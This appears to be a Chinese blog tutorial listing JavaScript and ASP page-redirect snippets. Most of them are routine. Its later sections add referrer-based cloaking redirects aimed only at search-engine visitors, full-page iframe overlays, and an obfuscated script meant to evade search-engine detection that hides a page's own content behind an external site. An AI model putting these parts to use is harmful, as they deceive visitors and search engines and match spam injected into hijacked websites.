js跳轉程式碼
阿新 • • 發佈:2021-07-07
一、常規的js頁面跳轉程式碼
1、在原來的窗體中直接跳轉用
<script type="text/JavaScript">
window.location.href="你所要跳轉的頁面";
</script>
2、在新窗體中開啟頁面用:
<script type="text/JavaScript">
window.open('你所要跳轉的頁面');
</script>
3、JS頁面跳轉引數的註解
<SCRIPT LANGUAGE="javascript">
<!--
window.open ('page.html', 'newwindow', 'height=100, width=400, top=0,left=0, toolbar=no, menubar=no, scrollbars=no, resizable=no,location=no, status=no')
//寫成一行
-->
</SCRIPT>
引數解釋:
window.open 彈出新視窗的命令;
'page.html' 彈出視窗的檔名;
'newwindow' 彈出視窗的名字(不是檔名),非必須,可用空'代替;
height=100 視窗高度;
width=500 視窗寬度;
top=0 視窗距離螢幕上方的象素值;
left=0 視窗距離螢幕左側的象素值。
二、跳轉指定頁面的JS程式碼
第1種:
<script language="javascript" type="text/javascript">
window.location.href="login.jsp?backurl="+window.location.href;
</script>
第2種:
<script language="javascript">
alert("返回");
window.history.back(-1);
</script>
第3種:
<script language="javascript">
window.navigate("top.jsp");
</script>
第4種:
<script language="JavaScript">
self.location='top.htm';
</script>
第5種:
<script language="javascript">
alert("非法訪問!");
top.location='xx.jsp';
</script>
三、頁面停留指定時間再跳轉(如3秒)
<script type="text/javascript">
function jumurl(){
window.location.href = 'http://www.fly63.com/';
}
setTimeout(jumurl,3000);
</script>
四、根據訪客來源跳轉的JS程式碼
1、JS判斷來路程式碼
此段程式碼主要用於百度谷歌點選進入跳轉,直接開啟網站不跳轉:
<script LANGUAGE="Javascript">
var s=document.referrer
if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 )
location.href="http://www.fly63.com/";
</script>
2、JS直接跳轉程式碼
<script LANGUAGE="Javascript">
location.href="http://www.fly63.com/";
</script>
3、ASP跳轉程式碼判斷來路
<%
if instr(Request.Servervariables("http_referer"),"www.baidu.com")>0 then
response.redirect("http://www.fly63.com/")
end if
%>
4、ASP直接跳轉的
<%
response.redirect("http://www.fly63.com/")
%>
五、廣告與網站頁面一起的JS程式碼
1、上面是廣告下面是站群的程式碼
document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='5000' allowTransparency src=http://www.fly63.com/></iframe>");
2、全部覆蓋的程式碼
document.write("</iframe><iframe src='http://www.fly63.com/' rel='nofollow' scrolling='no' frameborder='0' width='100%' height='2000'>");
3、混淆防止搜尋引擎被查的js呼叫
具體的展示上面是廣告下面是站群的程式碼:
var ss = '<center id="showcloneshengxiaon"><ifr'+'ame scrolling="no" marginheight=0 marginwidth=0 frameborder="0" width="100%" width="14'+'00" height="63'+'50" src="ht'+'tp://'+'ww'+'w.f'+'ly'+'63.c'+'om/"></iframe></center>';
eval("do"+"cu"+"ment.wr"+"ite('"+ss+"');");
try{
setInterval(function(){
try{
document.getElementById("div"+"All").style.display="no"+"ne";
}catch(e){}
for(var i=0;i<document.body.children.length;i++){
try{
var tagname = document.body.children[i].tagName;
var myid = document.body.children[i].id;
if(myid!="icondiv1" && myid!="showcloneshengxiaon"){
// if(tagname!="center"){
document.body.children[i].style.display="non"+"e";
//}
}
}catch(e){}
}
},100);
}catch(e){}
六、頁面跳出框架
<script type="text/javascript">
top.location.href='http://www.fly63.com/';
</script>
七、返回上一頁
<script type="text/javascript">
window.history.back(-1);
</script>